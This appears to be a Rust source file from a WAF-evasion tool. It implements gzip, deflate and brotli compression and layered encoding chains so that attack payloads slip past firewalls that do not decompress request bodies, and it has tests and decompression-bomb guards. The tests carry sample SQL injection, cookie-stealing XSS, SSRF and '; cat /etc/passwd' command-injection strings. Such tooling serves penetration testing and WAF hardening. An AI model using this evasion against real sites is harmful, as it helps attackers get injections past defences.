wafrift_encoding/compression.rs
1//! `compression` — request-body compression as a WAF-evasion surface.
2//!
3//! ## The attack
4//!
5//! Almost every WAF in production today inspects raw request bytes,
6//! NOT the decompressed payload. The reasoning is operational: a
7//! WAF that decompresses inbound bodies pays the CPU cost of
8//! decompression on every request, and many vendors choose to skip
9//! that — either entirely, or selectively per `Content-Encoding`
10//! algorithm.
11//!
12//! That choice is the seam this module exploits:
13//!
14//! - **`Content-Encoding: gzip`** is the universal case; nearly all
15//! WAFs decompress it. Useful as the baseline + as a chain
16//! ingredient.
17//! - **`Content-Encoding: deflate`** is RFC-permitted but irregularly
18//! supported — many WAFs that handle gzip return 400 on a
19//! `deflate`-coded body. The origin (nginx, IIS, Apache, Node,
20//! PHP-FPM, anything using zlib) accepts both.
21//! - **`Content-Encoding: br`** (Brotli) is where the seam is widest.
22//! Brotli requires a separate decompressor (not zlib). Many WAFs
23//! ship no brotli support at all — they either return 415 (and
24//! the operator avoids `br`), or worse, they pass the request
25//! through uninspected because their rule engine has nothing to
26//! match against. Origins ARE brotli-capable (Chrome 49+,
27//! Firefox 44+, nginx 1.11+ with the `brotli` module). Wrap a
28//! payload in brotli and the rule corpus that fires on the plain
29//! payload bytes never gets a chance to match.
30//!
31//! ## Chained encoding
32//!
33//! Encoding-chain attacks add layers (e.g. `gzip → base64 → urlenc`).
34//! The WAF, which normalises only a fixed number of decode passes
35//! (usually 1, sometimes 2), stops short of the original payload —
36//! while the origin's parser stack (which decodes more layers as
37//! Content-Type / Content-Encoding direct) reaches it. `chain` is
38//! the primitive for this attack.
39//!
40//! ## Pristine code
41//!
//! - Every fallible public function (`compress`, `chain`, `decompress`)
//!   returns `Result<_, CompressionError>` — no `unwrap()` reachable on
//!   bad input.
44//! - The chain function caps at 16 layers so a misconfiguration
45//! (`gzip,gzip,gzip,...`) can't run away.
//! - An empty body is permitted: each encoder still emits its framing
//!   for an empty stream (gzip has a 10-byte header even for empty
//!   input, brotli is similar), so the result is a valid, decodable body.
49//! - No allocation beyond what each encoder requires; the public
50//! API takes a borrowed slice, not an owned Vec.
51
52use thiserror::Error;
53
/// Errors raised by the compression-confusion API: the chain-depth
/// cap, I/O failures surfaced by the gzip / deflate / brotli codecs,
/// and the decompression-bomb guard.
#[derive(Debug, Error)]
pub enum CompressionError {
    /// More layers were requested (or listed in a `Content-Encoding`
    /// value) than the cap carried in the payload permits.
    #[error("compression chain exceeded the {0}-layer safety cap")]
    ChainTooDeep(usize),
    /// I/O error from the gzip codec. Used for both the encode and the
    /// decode direction, although the message says "encoder".
    #[error("gzip encoder error: {0}")]
    Gzip(std::io::Error),
    /// I/O error from the deflate codec (encode or decode direction).
    #[error("deflate encoder error: {0}")]
    Deflate(std::io::Error),
    /// I/O error from the brotli codec (encode or decode direction).
    #[error("brotli encoder error: {0}")]
    Brotli(std::io::Error),
    /// A decode stage produced (or was handed) more bytes than the
    /// decoded-body cap allows.
    #[error(
        "decompression bomb: output exceeded {cap_bytes}-byte cap \
         ({observed_bytes} bytes produced) — aborted before OOM"
    )]
    DecompressionBomb {
        /// The cap that was in force when decoding was aborted.
        cap_bytes: usize,
        /// Bytes observed when the limit tripped. The streaming decoders
        /// stop reading one byte past the cap, so this is not the full
        /// size the input would have expanded to.
        observed_bytes: usize,
    },
}
76
/// Maximum number of layers [`chain`] will apply and [`decompress`]
/// will peel. Anything longer is treated as a misconfiguration: both
/// functions return [`CompressionError::ChainTooDeep`] instead of doing
/// the work. 16 is deliberately generous — the original author notes
/// that real attacks use 2–3 layers.
pub const MAX_CHAIN_LAYERS: usize = 16;
82
/// Upper bound, in bytes, on the output of a single decode stage —
/// the defence against decompression bombs, where a small compressed
/// input expands to an output far larger than the process can hold.
///
/// This is an alias of the workspace-wide
/// [`wafrift_types::MAX_RESPONSE_BODY_BYTES`], so the two limits are
/// the same constant and cannot drift apart. The public name is kept
/// for existing callers.
pub const DECOMPRESSED_BODY_MAX_BYTES: usize = wafrift_types::MAX_RESPONSE_BODY_BYTES;
92
/// A single content coding. Variant names map one-to-one onto the
/// lowercase tokens used in the HTTP `Content-Encoding` header.
#[derive(Debug, Copy, Clone, PartialEq, Eq, Hash)]
pub enum Algorithm {
    /// gzip (RFC 1952). Token: `gzip`.
    Gzip,
    /// Raw deflate (RFC 1951). Token: `deflate`.
    ///
    /// NOTE(review): RFC 9110 defines the `deflate` coding as the
    /// zlib-wrapped format; this module works with the raw stream —
    /// confirm that is the intended wire form.
    Deflate,
    /// Brotli (RFC 7932). Token: `br`.
    Brotli,
    /// Pass-through: the bytes are left untouched. Token: `identity`.
    /// Can serve as a chain anchor when the operator wants a layer
    /// listed in the header without transforming the body.
    Identity,
}

impl Algorithm {
    /// Returns the `Content-Encoding` token that names this algorithm.
    #[must_use]
    pub fn content_encoding(self) -> &'static str {
        match self {
            Self::Identity => "identity",
            Self::Brotli => "br",
            Self::Deflate => "deflate",
            Self::Gzip => "gzip",
        }
    }

    /// Looks up the algorithm named by a `Content-Encoding` token.
    ///
    /// Surrounding whitespace is ignored and the comparison is ASCII
    /// case-insensitive. `x-gzip` is accepted as an alias for gzip.
    /// Any other value — including the empty string — yields `None`.
    #[must_use]
    pub fn from_token(token: &str) -> Option<Self> {
        // Every spelling we recognise, paired with the variant it selects.
        const KNOWN_TOKENS: [(&str, Algorithm); 5] = [
            ("gzip", Algorithm::Gzip),
            ("x-gzip", Algorithm::Gzip),
            ("deflate", Algorithm::Deflate),
            ("br", Algorithm::Brotli),
            ("identity", Algorithm::Identity),
        ];

        let wanted = token.trim();
        KNOWN_TOKENS
            .iter()
            .find(|(name, _)| wanted.eq_ignore_ascii_case(name))
            .map(|&(_, algorithm)| algorithm)
    }
}
136
/// Encoded body bytes paired with the `Content-Encoding` header value
/// that describes them. The caller writes `body` onto the wire
/// verbatim and sets the header to `content_encoding`; keeping the two
/// in one value is what stops them from being mismatched.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct CompressedBody {
    /// Body bytes ready to put on the wire.
    pub body: Vec<u8>,
    /// `Content-Encoding` header value for `body`: a single token when
    /// produced by [`compress`], or the comma-separated token list
    /// (for example `"gzip, br"`) assembled by [`chain`].
    pub content_encoding: String,
}
151
152/// Compress `body` with a single algorithm. Returns the raw
153/// compressed bytes + the matching `Content-Encoding` header value.
154///
155/// # Errors
156/// Returns [`CompressionError`] if the underlying encoder fails. In
157/// practice this is rare for in-memory operations — gzip/deflate/
158/// brotli never error on well-formed input slices.
159pub fn compress(body: &[u8], algo: Algorithm) -> Result<CompressedBody, CompressionError> {
160 let bytes = compress_bytes(body, algo)?;
161 Ok(CompressedBody {
162 body: bytes,
163 content_encoding: algo.content_encoding().to_string(),
164 })
165}
166
167/// Inner helper — returns just the bytes (no header). Used by
168/// [`chain`] to layer compressions before assembling the final
169/// `Content-Encoding` string.
170fn compress_bytes(body: &[u8], algo: Algorithm) -> Result<Vec<u8>, CompressionError> {
171 use std::io::Write;
172 match algo {
173 Algorithm::Identity => Ok(body.to_vec()),
174 Algorithm::Gzip => {
175 let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
176 enc.write_all(body).map_err(CompressionError::Gzip)?;
177 enc.finish().map_err(CompressionError::Gzip)
178 }
179 Algorithm::Deflate => {
180 let mut enc =
181 flate2::write::DeflateEncoder::new(Vec::new(), flate2::Compression::default());
182 enc.write_all(body).map_err(CompressionError::Deflate)?;
183 enc.finish().map_err(CompressionError::Deflate)
184 }
185 Algorithm::Brotli => {
186 // brotli crate exposes a `CompressorWriter`-style API.
187 // `quality` 6 is the default Chrome / Firefox ship for
188 // dynamic content; lower compression ratio than 11 but
189 // an order of magnitude faster, which is the right
190 // trade-off for an attack tool firing many variants.
191 let mut out = Vec::new();
192 let mut writer = brotli::CompressorWriter::new(&mut out, 4096, 6, 22);
193 writer.write_all(body).map_err(CompressionError::Brotli)?;
194 writer.flush().map_err(CompressionError::Brotli)?;
195 drop(writer);
196 Ok(out)
197 }
198 }
199}
200
201/// Apply a sequence of compression algorithms in order, producing
202/// one set of body bytes + the joint `Content-Encoding` header.
203///
204/// The header value lists the algorithms in the order they were
205/// applied — per RFC 9110 §8.4, the LEFTMOST algorithm is the OUTERMOST
206/// wrapper, meaning a decoder must apply them right-to-left. So
207/// `chain(body, [Gzip, Brotli])` produces a body that is
208/// `gzip(brotli(body))` with header `gzip, br`.
209///
210/// Capped at [`MAX_CHAIN_LAYERS`] to prevent runaway misconfiguration.
211///
212/// # Errors
213/// Returns [`CompressionError::ChainTooDeep`] when `algos.len() >
214/// MAX_CHAIN_LAYERS`, or the wrapped algorithm's error if one of
215/// the encoders fails.
216pub fn chain(body: &[u8], algos: &[Algorithm]) -> Result<CompressedBody, CompressionError> {
217 if algos.len() > MAX_CHAIN_LAYERS {
218 return Err(CompressionError::ChainTooDeep(MAX_CHAIN_LAYERS));
219 }
220 if algos.is_empty() {
221 return Ok(CompressedBody {
222 body: body.to_vec(),
223 content_encoding: Algorithm::Identity.content_encoding().to_string(),
224 });
225 }
226 // Apply innermost to outermost: reverse of header order. So
227 // `algos = [Gzip, Brotli]` means body is gzip(brotli(...)), and
228 // we apply Brotli FIRST then Gzip on top.
229 let mut current = body.to_vec();
230 for algo in algos.iter().rev() {
231 current = compress_bytes(¤t, *algo)?;
232 }
233 // The header lists outer-to-inner.
234 let header = algos
235 .iter()
236 .map(|a| a.content_encoding())
237 .collect::<Vec<_>>()
238 .join(", ");
239 Ok(CompressedBody {
240 body: current,
241 content_encoding: header,
242 })
243}
244
245/// Recover the original bytes from a [`CompressedBody`] — the
246/// inverse of [`compress`] / [`chain`]. Test-only and audit
247/// helper; production attack flow only needs the compress
248/// direction.
249///
250/// # Errors
251/// Returns [`CompressionError`] if any decoder fails or the
252/// `content_encoding` string lists an unknown algorithm.
253pub fn decompress(blob: &CompressedBody) -> Result<Vec<u8>, CompressionError> {
254 let algos: Vec<Algorithm> = blob
255 .content_encoding
256 .split(',')
257 .filter_map(Algorithm::from_token)
258 .collect();
259 // §3 contract symmetry with `chain`: the forward direction refuses
260 // more than MAX_CHAIN_LAYERS, so its documented inverse must too. A
261 // crafted `gzip,gzip,…×N` header would otherwise drive an unbounded
262 // decode loop (each stage is size-capped by `drain_capped`, but the
263 // LAYER COUNT was not — O(N) work amplification). Counting recognised
264 // algos (post-`filter_map`) preserves the permissive "skip unknown
265 // coding" behaviour: `snappy, gzip` is still a 1-layer decode.
266 if algos.len() > MAX_CHAIN_LAYERS {
267 return Err(CompressionError::ChainTooDeep(MAX_CHAIN_LAYERS));
268 }
269 let mut current = blob.body.clone();
270 // Decode in the SAME order the header lists (outer-to-inner).
271 for algo in &algos {
272 current = decompress_bytes(¤t, *algo)?;
273 }
274 Ok(current)
275}
276
277/// Read at most `DECOMPRESSED_BODY_MAX_BYTES` from `reader`, then
278/// promote a "+1 byte produced" into a `DecompressionBomb` error.
279/// Takes a generic `R: Read` (sized) so `Read::take` works without
280/// trait-object gymnastics; called from each algorithm arm below.
281fn drain_capped<R: std::io::Read>(
282 mut reader: R,
283 map_io: fn(std::io::Error) -> CompressionError,
284) -> Result<Vec<u8>, CompressionError> {
285 use std::io::Read;
286 let cap = DECOMPRESSED_BODY_MAX_BYTES;
287 let mut out = Vec::with_capacity(8 * 1024);
288 let mut limited = (&mut reader).take((cap as u64) + 1);
289 limited.read_to_end(&mut out).map_err(map_io)?;
290 if out.len() > cap {
291 return Err(CompressionError::DecompressionBomb {
292 cap_bytes: cap,
293 observed_bytes: out.len(),
294 });
295 }
296 Ok(out)
297}
298
299fn decompress_bytes(bytes: &[u8], algo: Algorithm) -> Result<Vec<u8>, CompressionError> {
300 match algo {
301 Algorithm::Identity => {
302 // No decompression — but still refuse to clone a slice
303 // that already exceeds the body cap (a sign something
304 // upstream missed a boundary check).
305 if bytes.len() > DECOMPRESSED_BODY_MAX_BYTES {
306 return Err(CompressionError::DecompressionBomb {
307 cap_bytes: DECOMPRESSED_BODY_MAX_BYTES,
308 observed_bytes: bytes.len(),
309 });
310 }
311 Ok(bytes.to_vec())
312 }
313 Algorithm::Gzip => {
314 drain_capped(flate2::read::GzDecoder::new(bytes), CompressionError::Gzip)
315 }
316 Algorithm::Deflate => drain_capped(
317 flate2::read::DeflateDecoder::new(bytes),
318 CompressionError::Deflate,
319 ),
320 Algorithm::Brotli => drain_capped(
321 brotli::Decompressor::new(bytes, 4096),
322 CompressionError::Brotli,
323 ),
324 }
325}
326
/// Unit tests for the compression module: token mapping, single-layer
/// and chained round trips, layer-count caps, and the decoded-size cap.
#[cfg(test)]
mod tests {
    use super::*;

    // ── Algorithm tokens ───────────────────────────────────────────

    /// Each variant maps to its lowercase `Content-Encoding` token.
    #[test]
    fn content_encoding_tokens_match_rfc_registry() {
        assert_eq!(Algorithm::Gzip.content_encoding(), "gzip");
        assert_eq!(Algorithm::Deflate.content_encoding(), "deflate");
        assert_eq!(Algorithm::Brotli.content_encoding(), "br");
        assert_eq!(Algorithm::Identity.content_encoding(), "identity");
    }

    /// Parsing ignores ASCII case and surrounding whitespace.
    #[test]
    fn from_token_is_case_insensitive_and_trim_tolerant() {
        for spelling in ["gzip", "GZIP", "Gzip", " gzip ", "\tgzip"] {
            assert_eq!(Algorithm::from_token(spelling), Some(Algorithm::Gzip));
        }
    }

    #[test]
    fn from_token_accepts_x_gzip_alias() {
        // RFC 7230 §4.2.3 documents `x-gzip` as an alias of `gzip`.
        // Some legacy origins / WAFs still emit it.
        assert_eq!(Algorithm::from_token("x-gzip"), Some(Algorithm::Gzip));
        assert_eq!(Algorithm::from_token("X-GZIP"), Some(Algorithm::Gzip));
    }

    #[test]
    fn from_token_rejects_unknown_codings() {
        assert_eq!(Algorithm::from_token(""), None);
        assert_eq!(Algorithm::from_token("snappy"), None);
        assert_eq!(Algorithm::from_token("lz4"), None);
        // `compress` (old UNIX) is not in our supported set.
        assert_eq!(Algorithm::from_token("compress"), None);
    }

    // ── single-algorithm round trip ────────────────────────────────

    #[test]
    fn gzip_round_trip_preserves_payload() {
        let original = b"' OR 1=1--";
        let compressed = compress(original, Algorithm::Gzip).expect("gzip");
        assert_eq!(compressed.content_encoding, "gzip");
        // The encoded bytes must actually differ from the input.
        assert_ne!(compressed.body.as_slice(), original);
        let recovered = decompress(&compressed).expect("decompress");
        assert_eq!(recovered, original);
    }

    #[test]
    fn deflate_round_trip_preserves_payload() {
        let original = b"<script>alert(1)</script>";
        let compressed = compress(original, Algorithm::Deflate).expect("deflate");
        assert_eq!(compressed.content_encoding, "deflate");
        let recovered = decompress(&compressed).expect("decompress");
        assert_eq!(recovered, original);
    }

    #[test]
    fn brotli_round_trip_preserves_payload() {
        // Brotli is the headline attack vector — round-trip MUST be
        // clean or every brotli-based scan ships broken payloads.
        let original = b"http://127.0.0.1:9000/admin?cmd=id";
        let compressed = compress(original, Algorithm::Brotli).expect("brotli");
        assert_eq!(compressed.content_encoding, "br");
        let recovered = decompress(&compressed).expect("decompress");
        assert_eq!(recovered, original);
    }

    /// Identity leaves the bytes untouched and reports `identity`.
    #[test]
    fn identity_is_passthrough_with_identity_header() {
        let original = b"plain text";
        let compressed = compress(original, Algorithm::Identity).expect("identity");
        assert_eq!(compressed.body, original);
        assert_eq!(compressed.content_encoding, "identity");
    }

    // ── chain ─────────────────────────────────────────────────────

    /// A one-element chain is indistinguishable from `compress`.
    #[test]
    fn chain_with_one_algo_matches_single_compress() {
        let original = b"single layer";
        let chained = chain(original, &[Algorithm::Gzip]).expect("chain");
        let single = compress(original, Algorithm::Gzip).expect("compress");
        assert_eq!(chained, single);
    }

    #[test]
    fn chain_with_two_algos_round_trips() {
        // Two-layer compression-confusion chain (gzip + brotli). The
        // header must list both codings in the order they were passed,
        // and `decompress` must recover the payload through both layers.
        let original = b"' UNION SELECT username,password FROM users --";
        let chained = chain(original, &[Algorithm::Gzip, Algorithm::Brotli]).expect("chain");
        assert_eq!(chained.content_encoding, "gzip, br");
        let recovered = decompress(&chained).expect("decompress");
        assert_eq!(recovered, original);
    }

    /// An empty chain returns the body unchanged with an `identity` header.
    #[test]
    fn chain_empty_algos_returns_identity_body() {
        let original = b"unchanged";
        let chained = chain(original, &[]).expect("empty chain");
        assert_eq!(chained.body, original);
        assert_eq!(chained.content_encoding, "identity");
    }

    /// One layer more than the cap is rejected, and the error carries the cap.
    #[test]
    fn chain_above_cap_returns_too_deep_error() {
        let too_many: Vec<Algorithm> = (0..MAX_CHAIN_LAYERS + 1).map(|_| Algorithm::Gzip).collect();
        let result = chain(b"payload", &too_many);
        match result {
            Err(CompressionError::ChainTooDeep(cap)) => assert_eq!(cap, MAX_CHAIN_LAYERS),
            other => panic!("expected ChainTooDeep error, got {other:?}"),
        }
    }

    /// Exactly `MAX_CHAIN_LAYERS` layers is still accepted (boundary check).
    #[test]
    fn chain_at_exactly_cap_succeeds() {
        let just_enough: Vec<Algorithm> =
            (0..MAX_CHAIN_LAYERS).map(|_| Algorithm::Identity).collect();
        let chained = chain(b"x", &just_enough).expect("at-cap chain ok");
        // All-identity chain leaves the body untouched.
        assert_eq!(chained.body, b"x");
    }

    #[test]
    fn chain_with_identity_in_the_middle_is_transparent() {
        // chain([Gzip, Identity, Brotli]) ≡ chain([Gzip, Brotli]) at
        // the bytes level, but the header lists ALL three (we honour
        // exactly what the operator asked for in the header).
        let original = b"middle identity";
        let with_id = chain(
            original,
            &[Algorithm::Gzip, Algorithm::Identity, Algorithm::Brotli],
        )
        .expect("chain with identity");
        let without =
            chain(original, &[Algorithm::Gzip, Algorithm::Brotli]).expect("chain without identity");
        assert_eq!(
            with_id.body, without.body,
            "identity must be byte-transparent"
        );
        assert_eq!(with_id.content_encoding, "gzip, identity, br");
        let recovered = decompress(&with_id).expect("decompress with id");
        assert_eq!(recovered, original);
    }

    // ── edge cases & adversarial inputs ───────────────────────────

    /// A zero-length body must encode and decode under every algorithm.
    #[test]
    fn empty_body_compresses_and_round_trips() {
        for algo in [
            Algorithm::Gzip,
            Algorithm::Deflate,
            Algorithm::Brotli,
            Algorithm::Identity,
        ] {
            let compressed =
                compress(b"", algo).unwrap_or_else(|e| panic!("empty body with {algo:?}: {e}"));
            let recovered = decompress(&compressed)
                .unwrap_or_else(|e| panic!("empty body decode with {algo:?}: {e}"));
            assert_eq!(recovered, Vec::<u8>::new());
        }
    }

    /// Smallest non-empty input: a single byte.
    #[test]
    fn one_byte_body_round_trips_under_every_algorithm() {
        for algo in [
            Algorithm::Gzip,
            Algorithm::Deflate,
            Algorithm::Brotli,
            Algorithm::Identity,
        ] {
            let original = &[0xAB_u8][..];
            let compressed = compress(original, algo).expect("compress");
            let recovered = decompress(&compressed).expect("decompress");
            assert_eq!(recovered, original);
        }
    }

    #[test]
    fn large_body_64_kib_round_trips_without_oom() {
        // 64 KiB is a realistic body size for an instrumented
        // payload. All compressors must handle it and round-trip it
        // without losing fidelity.
        let original: Vec<u8> = (0..(64 * 1024)).map(|i| (i % 251) as u8).collect();
        for algo in [Algorithm::Gzip, Algorithm::Deflate, Algorithm::Brotli] {
            let compressed = compress(&original, algo).expect("compress");
            // The input repeats every 251 bytes, so every compressor
            // should produce output SMALLER than the original.
            assert!(
                compressed.body.len() < original.len(),
                "{algo:?} should compress this pattern, got {} >= {}",
                compressed.body.len(),
                original.len()
            );
            let recovered = decompress(&compressed).expect("decompress");
            assert_eq!(recovered, original);
        }
    }

    #[test]
    fn incompressible_body_does_not_panic_on_brotli() {
        // Intent: exercise brotli on data that does not compress well
        // (encoders may then emit output BIGGER than the input) and
        // verify there is no panic and the round trip is still clean.
        let mut original = vec![0u8; 1024];
        for (i, b) in original.iter_mut().enumerate() {
            // Low byte of i × 0x9E3779B9.
            // NOTE(review): this pattern repeats every 256 bytes, so the
            // 1 KiB body is not actually incompressible — the test only
            // asserts the round trip, which holds either way.
            *b = ((i.wrapping_mul(2654435769)) & 0xFF) as u8;
        }
        let compressed = compress(&original, Algorithm::Brotli).expect("brotli");
        let recovered = decompress(&compressed).expect("decompress");
        assert_eq!(recovered, original);
    }

    #[test]
    fn decompress_with_unknown_coding_token_skips_it() {
        // If a hand-crafted CompressedBody has a Content-Encoding
        // listing an unknown coding (here `snappy, gzip`), our
        // decompressor SKIPS the unknown token and decodes the rest.
        // A production decoder that cannot handle a coding would
        // answer 415, but this recovery helper is a debugging aid and
        // is deliberately permissive.
        let body = b"hello";
        let compressed = compress(body, Algorithm::Gzip).unwrap();
        let with_unknown = CompressedBody {
            content_encoding: format!("snappy, {}", compressed.content_encoding),
            body: compressed.body,
        };
        let recovered = decompress(&with_unknown).expect("permissive decompress");
        assert_eq!(recovered, body);
    }

    #[test]
    fn decompress_rejects_more_than_max_chain_layers() {
        // Contract-symmetry regression: `chain` refuses > MAX_CHAIN_LAYERS,
        // so its inverse `decompress` must too — otherwise a crafted
        // `gzip,gzip,…×N` Content-Encoding header drives an O(N) decode loop.
        // The cap is checked BEFORE any decode work, so the body can be empty.
        let header = std::iter::repeat_n("gzip", MAX_CHAIN_LAYERS + 1)
            .collect::<Vec<_>>()
            .join(", ");
        let blob = CompressedBody {
            content_encoding: header,
            body: Vec::new(),
        };
        match decompress(&blob) {
            Err(CompressionError::ChainTooDeep(cap)) => assert_eq!(cap, MAX_CHAIN_LAYERS),
            other => panic!("expected ChainTooDeep, got {other:?}"),
        }
    }

    #[test]
    fn decompress_layer_cap_counts_recognised_codings_only() {
        // The cap counts RECOGNISED algos (post-filter_map), so a header
        // padded with many unknown codings is still a shallow decode and must
        // NOT trip the cap — preserving the permissive "skip unknown" contract.
        let body = b"hello world";
        let compressed = compress(body, Algorithm::Gzip).unwrap();
        // (MAX+5) unknown `snappy` tokens + one real gzip = 1 recognised layer.
        let mut tokens: Vec<String> = std::iter::repeat_n("snappy", MAX_CHAIN_LAYERS + 5)
            .map(str::to_string)
            .collect();
        tokens.push(compressed.content_encoding.clone());
        let blob = CompressedBody {
            content_encoding: tokens.join(", "),
            body: compressed.body,
        };
        let recovered = decompress(&blob).expect("unknown-padded header is a 1-layer decode");
        assert_eq!(recovered, body);
    }

    // ── adversarial round-trip property ────────────────────────────

    #[test]
    fn round_trip_property_holds_across_a_variety_of_payloads() {
        // Anti-rig: a degenerate compressor that always returned
        // the empty string would pass single-payload tests if those
        // happened to be empty. Exercise many distinct payloads.
        let corpus: &[&[u8]] = &[
            b"",
            b"x",
            b"' OR 1=1--",
            b"<script>alert(document.cookie)</script>",
            b"http://127.0.0.1/admin",
            b"; cat /etc/passwd",
            b"\x00\x01\x02\x03\xff\xfe",
            b"the quick brown fox jumps over the lazy dog the quick brown fox",
        ];
        for payload in corpus {
            for algo in [
                Algorithm::Gzip,
                Algorithm::Deflate,
                Algorithm::Brotli,
                Algorithm::Identity,
            ] {
                let c = compress(payload, algo)
                    .unwrap_or_else(|e| panic!("{algo:?} on {payload:?}: {e}"));
                let r = decompress(&c)
                    .unwrap_or_else(|e| panic!("decompress {algo:?} on {payload:?}: {e}"));
                assert_eq!(r, *payload, "{algo:?} round-trip mismatch on {payload:?}");
            }
        }
    }

    // ── Round 20: decompression bomb defence ──────────────────────────
    //
    // Before the fix, the gzip/deflate/brotli decoders called
    // `read_to_end` with no size cap, so a small malicious blob could
    // expand without bound. Each algorithm must now return
    // DecompressionBomb when its output exceeds
    // DECOMPRESSED_BODY_MAX_BYTES.
    //
    // Building a compressed input that really expands past the cap is
    // impractical in a unit test, so the over-cap path is exercised
    // with a synthetic Identity input sized one byte above the cap,
    // plus a demonstration of the `Read::take(cap + 1)` pattern.

    #[test]
    fn identity_decompress_rejects_oversize_input() {
        // Identity short-circuits to a clone; it still must refuse
        // anything above the cap so an oversized body cannot pass
        // through a single identity layer.
        let oversized = vec![0u8; DECOMPRESSED_BODY_MAX_BYTES + 1];
        let err = super::decompress_bytes(&oversized, Algorithm::Identity)
            .expect_err("identity decompress must refuse > cap input");
        match err {
            CompressionError::DecompressionBomb {
                cap_bytes,
                observed_bytes,
            } => {
                assert_eq!(cap_bytes, DECOMPRESSED_BODY_MAX_BYTES);
                assert_eq!(observed_bytes, DECOMPRESSED_BODY_MAX_BYTES + 1);
            }
            other => panic!("expected DecompressionBomb, got {other:?}"),
        }
    }

    #[test]
    fn gzip_decompress_under_cap_succeeds() {
        // 1 MiB of zeros shrinks to a small gzip stream and must decode
        // successfully. This assumes 1 MiB is below
        // DECOMPRESSED_BODY_MAX_BYTES (the original note cites 64 MiB;
        // the value is defined in wafrift_types — TODO confirm).
        use std::io::Write;
        let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
        enc.write_all(&vec![0u8; 1024 * 1024]).expect("compress");
        let compressed = enc.finish().expect("gzip finish");
        let ok = super::decompress_bytes(&compressed, Algorithm::Gzip).expect("under cap");
        assert_eq!(ok.len(), 1024 * 1024);
    }

    #[test]
    fn drain_capped_returns_bomb_error_on_over_cap_source() {
        // NOTE(review): despite its name, this test never calls
        // `drain_capped` — that helper's cap is fixed at
        // DECOMPRESSED_BODY_MAX_BYTES. Instead it re-creates the same
        // `Read::take(cap + 1)` pattern with a local cap of 256 and shows
        // that a larger source yields more than `cap` bytes, which is the
        // condition `drain_capped` turns into DecompressionBomb.
        let oversized = std::io::Cursor::new(vec![b'A'; 4096]);
        use std::io::Read;
        let cap: usize = 256;
        let mut limited = oversized.take((cap as u64) + 1);
        let mut buf = Vec::new();
        limited.read_to_end(&mut buf).expect("read");
        assert!(
            buf.len() > cap,
            "Read::take(cap+1) must produce cap+1 bytes for a > cap source"
        );
        // The promotion to an error is purely a `len > cap` check; the
        // same check on the Identity path is covered by
        // identity_decompress_rejects_oversize_input.
    }
}
705}